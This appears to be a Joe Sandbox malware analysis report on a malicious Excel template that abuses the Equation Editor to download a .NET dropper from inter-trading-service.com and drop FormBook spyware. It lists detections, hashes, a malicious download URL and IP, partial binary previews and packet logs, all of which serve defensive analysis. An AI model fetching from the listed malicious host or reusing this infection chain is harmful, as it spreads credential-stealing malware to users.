            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | 49% | Metadefender |
            C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | 86% | ReversingLabs | Win32.Trojan.FormBook
            C:\Users\user\AppData\Local\Temp\tynex.exe | 28% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
            C:\Users\Public\tynex.exe | 28% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

            Source | Detection | Scanner | Label
            7.0.FB_C479.tmp.exe.1340000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.2.tynex.exe.36294d0.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            7.2.FB_C479.tmp.exe.1340000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.2.tynex.exe.39186d0.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
            7.1.FB_C479.tmp.exe.1340000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.2.tynex.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.1.tynex.exe.720000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            4.2.tynex.exe.276b818.2.unpack | 100% | Avira | TR/Dropper.Gen

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
            http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
            http://treyresearch.net | 0% | URL Reputation | safe
            http://inter-trading-service.com/Di4/New_1007572_021.exe | 0% | Avira URL Cloud | safe
            http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
            http://www.%s.com | 0% | URL Reputation | safe
            http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
            http://www.%s.comPA | 0% | URL Reputation | safe
            http://%s.com | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            inter-trading-service.com | 160.153.129.234 | true | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://inter-trading-service.com/Di4/New_1007572_021.exe | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.windows.com/pctv. | tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp | false | | high
            http://investor.msn.com | tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp | false | | high
            http://www.msnbc.com/news/ticker.txt | tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp | false | | high
            http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp | false | | high
            http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp | false | | high
            http://www.msn.com/de-de/?ocid=iehpT | explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp | false | | high
            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1k | explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp | false | | high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.hotmail.com/oe | tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp | false | | high
            http://treyresearch.net | explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000008.00000000.2177419686.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmp | false | | high
            http://auto.search.msn.com/response.asp?MT= | explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp | false | | high
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp | false | | high
            http://www.icra.org/vocabulary/. | tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmp | false | | high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp | false | | high
            http://investor.msn.com/ | tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp | false | | high
            http://www.msn.com/?ocid=iehp | explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp | false | | high
            http://www.%s.com | explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
            http://www.piriform.com/ccleaner | explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp | false | | high
            http://computername/printers/printername/.printer | explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
            http://www.%s.comPA | explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe | low
            http://www.msn.com/de-de/?ocid=iehp3 | explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp | false | | high
            http://%s.com | explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            160.153.129.234 | inter-trading-service.com | United States | 21501 | GODADDY-AMSDE | true

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:458850
                                                Start date:03.08.2021
                                                Start time:19:47:50
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 11m 1s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:New_1007572_021.xltx
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLTX@13/9@2/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 27% (good quality ratio 25.8%)
                                                • Quality average: 72.2%
                                                • Quality standard deviation: 28.6%
                                                HCA Information:
                                                • Successful, ratio: 77%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xltx
                                                • Close Viewer
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458850/sample/New_1007572_021.xltx

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
19:48:44 | API Interceptor | 67x Sleep call for process: EQNEDT32.EXE modified
19:48:46 | API Interceptor | 230x Sleep call for process: tynex.exe modified
19:49:18 | API Interceptor | 92x Sleep call for process: FB_C479.tmp.exe modified
19:49:43 | API Interceptor | 221x Sleep call for process: cscript.exe modified

                                                Joe Sandbox View / Context

                                                IPs

Match | Associated Sample Name / URL | Detection | Context
160.153.129.234 | New order.xltx | malicious | inter-trading-service.com/id3T/ConsoleApp14.exe

                                                Domains

Match | Associated Sample Name / URL | Detection | Context
inter-trading-service.com | New order.xltx | malicious | 160.153.129.234

                                                ASN

Match | Associated Sample Name / URL | Detection | Context
GODADDY-AMSDE | ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe | malicious | 160.153.136.3
 | Purchase Requirements.exe | malicious | 160.153.136.3
 | New order.xltx | malicious | 160.153.129.234
 | statement.exe | malicious | 160.153.246.81
 | Purchase Requirements.exe | malicious | 160.153.136.3
 | Invoice no SS21-22185.exe | malicious | 160.153.246.81
 | i9Na8iof4G.exe | malicious | 160.153.136.3
 | 2129-20 30% CLAIM - PO SPO21-01-072.exe | malicious | 160.153.16.6
 | AMxAyl1FvN.doc | malicious | 160.153.208.149
 | M7ZGK4fBfl.exe | malicious | 160.153.136.3
 | altnp3zI5hfg3Eg.exe | malicious | 160.153.136.3
 | gqdJ6f9axq.exe | malicious | 160.153.136.3
 | YaRh8PG41y.exe | malicious | 160.153.136.3
 | 2129-20 30% CLAIM - PO SPO21-01-072.exe | malicious | 160.153.16.6
 | Invoice #210722 14,890 $.exe | malicious | 160.153.136.3
 | SCAN_Wells Fargo bank payment.exe | malicious | 160.153.133.86
 | PO.exe | malicious | 160.153.246.81
 | 4bTTNoUZaa.exe | malicious | 160.153.136.3
 | Inv_7623980.exe | malicious | 160.153.136.3
 | lono.exe | malicious | 160.153.136.3

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe | IMG_105_13_676_571.exe | malicious |
 | SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe | malicious |
 | 4-1.doc | malicious |
 | Order Inqury-93-23-20.doc | malicious |
 | IMG_7189012.exe | malicious |
 | SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe | malicious |
 | 77.doc | malicious |
 | qlvti.exe | malicious |
 | RFQ-220818.xls | malicious |
 | RFQ-220818.xls | malicious |

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:downloaded
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    Reputation:low
                                                                    IE Cache URL:http://inter-trading-service.com/Di4/New_1007572_021.exe
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 609x63, frames 3
                                                                    Category:modified
                                                                    Size (bytes):11345
                                                                    Entropy (8bit):7.599470125749675
                                                                    Encrypted:false
                                                                    SSDEEP:192:vPgndNBA4fwufvCYv17N+4exvNEJns295+QEwMWdUDV+yiy3rMB4Lz:vPgndE4f7CG17N+VuJsC5+jwMOWYBmz
                                                                    MD5:CF0E4D3B831F90332E0B61C6EC21B354
                                                                    SHA1:1E2DD6780419B138AD9FC2C45B84A51ABC2D6347
                                                                    SHA-256:FDE032888013EA6CC6D652DBECC1F357F8204A5327C78E84D01057024F956B76
                                                                    SHA-512:FCE0305E018D7BBB36E64468160894B5BECFCE20FA1EB8521333ECCE42FA850E788680D59C187D1F0B10C9198FBF7A616B2B7D56D66392E916FA2AC3B0CEBA95
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):1.7089931293899303
                                                                    Encrypted:false
                                                                    SSDEEP:24:7U6Id6l1iWyyyyyyyyytrUUUUUUUUUUgro:oO
                                                                    MD5:74BAFB3E707C7B0C63938AC200F99C7F
                                                                    SHA1:10C5506337845ED9BF25C73D2506F9C15AB8E608
                                                                    SHA-256:129450BA06AD589CF6846A455A5B6B5F55E164EE4906E409EB692AB465269689
                                                                    SHA-512:5B24DC5ACD14F812658E832B587B60695FB16954FCA006C2C3A7382EF0EC65C3BD1AAF699425C49FF3CCEEF16869E75DD6F00EC189B9F673F08F7E1B80CF7781
                                                                    Malicious:false
                                                                    Antivirus:
• Antivirus: Metadefender, Detection: 5%
                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                    Joe Sandbox View:
• Filename: IMG_105_13_676_571.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe, Detection: malicious
• Filename: 4-1.doc, Detection: malicious
• Filename: Order Inqury-93-23-20.doc, Detection: malicious
• Filename: IMG_7189012.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious
• Filename: 77.doc, Detection: malicious
• Filename: qlvti.exe, Detection: malicious
• Filename: RFQ-220818.xls, Detection: malicious
• Filename: RFQ-220818.xls, Detection: malicious
                                                                    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):186368
                                                                    Entropy (8bit):7.314572114292142
                                                                    Encrypted:false
                                                                    SSDEEP:3072:4dqYxe9j7g+D8OwXoopyPS5O1lFqRKMhZ6L7Ne61PCbyl2:4kXh8OIoYyq5ILqRKMo7cFN
                                                                    MD5:48ECE2CA39A9EAE7FCED7418CF071D46
                                                                    SHA1:7570995CBF699088A8F208015CB2C92BE5BC837A
                                                                    SHA-256:4119B29BC938578D5D243DB714D0619228D37C10CCAA52925F9E81A410720D59
                                                                    SHA-512:E897FDED4B643054796E410CADCC348C1215C934FE70F5407E36E9F10E59E2B10B7EDCBB99D746709AEF8FF498D98D848ADA90FB477EA732A128EE138ED0FD3B
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 49%
                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                    C:\Users\user\AppData\Local\Temp\tynex.exe
                                                                    Process:C:\Users\Public\tynex.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_1007572_021.LNK
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed Aug 4 01:48:37 2021, length=18379, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2088
                                                                    Entropy (8bit):4.507709111934133
                                                                    Encrypted:false
                                                                    SSDEEP:48:8LM/XT0ZVXbRrKl4Qh2LM/XT0ZVXbRrKl4Q/:8LM/XuVXbF+4Qh2LM/XuVXbF+4Q/
                                                                    MD5:77BC4104B953DB292FAAEF9200B0C23C
                                                                    SHA1:3F637A9400B4CE8E8214A5D2F390DB06ED2EA869
                                                                    SHA-256:5859B1E88CDCCC883D47F0C513CA3CFFE2669992F13CC970EDBCCD17E0DA0332
                                                                    SHA-512:DFD81A20411DE7A6F95456B59A6EA2DE1917C76DFEC5448ED81B99BD4483AFD90F1DFABF77650704D7D35A1F25C3D03CF49284C080D51012BFE8FD513C37AA5D
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):85
                                                                    Entropy (8bit):4.185015424439977
                                                                    Encrypted:false
                                                                    SSDEEP:3:HgAedaLUlzKMdaLUlmxWgAedaLUlv:HFeaLUhKkaLU/eaLU1
                                                                    MD5:618EC37A8CDBB18D2CECC9BD1A804D28
                                                                    SHA1:151F4284B4B8D1ABB594107311F9A1147C659623
                                                                    SHA-256:F83CBD16BFFA7ABBEC581821858358C2BF0B3121D681E0543AA8EA83A37A9D37
                                                                    SHA-512:F919566E710C8FF55DA6C28CF1E830614FCDDB09199914917FDE11641A7BEE5992EBC2F59F19861C0158C655A14FECC01FC481D18410768A1AA936DFA84FB57C
                                                                    Malicious:false
                                                                    Preview: [misc]..New_1007572_021.LNK=0..New_1007572_021.LNK=0..[misc]..New_1007572_021.LNK=0..
                                                                    C:\Users\user\Desktop\~$New_1007572_021.xltx
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:true
                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\Public\tynex.exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):455168
                                                                    Entropy (8bit):7.937198220453206
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                                    MD5:41137FD61B9CC0D92225C91660A5902C
                                                                    SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                                    SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                                    SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....

                                                                    Static File Info

                                                                    General

                                                                    File type:Microsoft Excel 2007+
                                                                    Entropy (8bit):7.914902908472318
                                                                    TrID:
                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                    File name:New_1007572_021.xltx
                                                                    File size:18379
                                                                    MD5:427e80f30505c596c822c141283a5a70
                                                                    SHA1:d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
                                                                    SHA256:d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
                                                                    SHA512:b25f13a6d540a4b20796bee8336b187bcb7c3fc9d8f7c04fbadcc7b897a9b4417336356db2134fc5ce4e230f656ff6eb9337edc993b68674d06ef1fe3138876d
                                                                    SSDEEP:384:s+ZSGClB7ap+ogsnXqYvEIl59nWPdLGHT7I+6f+0vNtQX:P9G7czBvEIlbEKz0hFtg
                                                                    File Content Preview:PK........L..S................[Content_Types].xmlUT...>..a>..a>..a.TMO.0..#...\....!....# .? k..[.....{.v...6P..M....e{t.t.X@B.|%...(..A..T...qp%.$....C%V.....d......=VbJ....z.Na."x......152.z.........'.4..!nF.0Q....%..2I`Q.w]`......Z.....;*..B..6..&.....

                                                                    File Icon

                                                                    Icon Hash:ecc2ca8a8cdcce80

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OpenXML
                                                                    Number of OLE Files:1

                                                                    OLE File "/opt/package/joesandbox/database/analysis/458850/sample/New_1007572_021.xltx"

                                                                    Indicators

                                                                    Has Summary Info:False
                                                                    Application Name:unknown
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:
                                                                    Contains Workbook/Book Stream:
                                                                    Contains PowerPoint Document Stream:
                                                                    Contains Visio Document Stream:
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:False

                                                                    Summary

                                                                    Author:Dell
                                                                    Last Saved By:Dell
                                                                    Create Time:2021-04-28T14:40:56Z
                                                                    Last Saved Time:2021-07-29T09:05:14Z
                                                                    Creating Application:Microsoft Excel
                                                                    Security:0

                                                                    Document Summary

                                                                    Thumbnail Scaling Desired:false
                                                                    Company:
                                                                    Contains Dirty Links:false
                                                                    Shared Document:false
                                                                    Changed Hyperlinks:false
                                                                    Application Version:15.0300

                                                                    Streams

                                                                    Stream Path: \x1OlE10NAtiVe, File Type: data, Stream Size: 1644
                                                                    General
                                                                    Stream Path:\x1OlE10NAtiVe
                                                                    File Type:data
                                                                    Stream Size:1644
                                                                    Entropy:7.65247560699
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . t . . ~ . . G . . . # > ( . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . D . . . . . . . . . . U . V . . . . . . . . . . . . . { . . . . . . F . . ! . o . 0 . . . . . . b . . . C . . { 1 . . 5 . . . o n , 6 . . . . { . . " h y . B . . ; . . { y . E . . . . p . . . . ? . . l . . . v e . . G . . . . . . K . . ^ . [ . . y I . . . g . . . d . S . f b . k F . T 1 . U . . . . . . h / > . . a / . . . . c . . . r 1 . . . s . . . . N . V
                                                                    Data Raw:a3 16 74 05 03 7e 01 eb 47 0a 01 05 23 3e 28 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e9 f9 01 00 00 c5 55 0c 56 05 93 80 99 ee b3 e2 1f 90 09 ef e0 de 7b e4 85 f1 c5 c2 aa 46 b5 92 21 fb 6f 9d 30 16 ac b3 d0 c0 f4 62 eb 82 e8 43

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                     Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                     Aug 3, 2021 19:48:49.125675917 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.153186083 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.153314114 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.153964043 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.182463884 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.187442064 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.187589884 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.189138889 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.189239979 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.190680027 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.190752029 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.191246033 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.191324949 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.192192078 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.192255020 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.192260027 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.192281008 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.192322016 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.192329884 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.192694902 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.192742109 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.192790985 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.193257093 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.193325996 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.207211018 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.214283943 CEST  80           49165      160.153.129.234  192.168.2.22
                                                                     Aug 3, 2021 19:48:49.214360952 CEST  49165        80         192.168.2.22     160.153.129.234
                                                                     Aug 3, 2021 19:48:49.214461088 CEST  80           49165      160.153.129.234  192.168.2.22
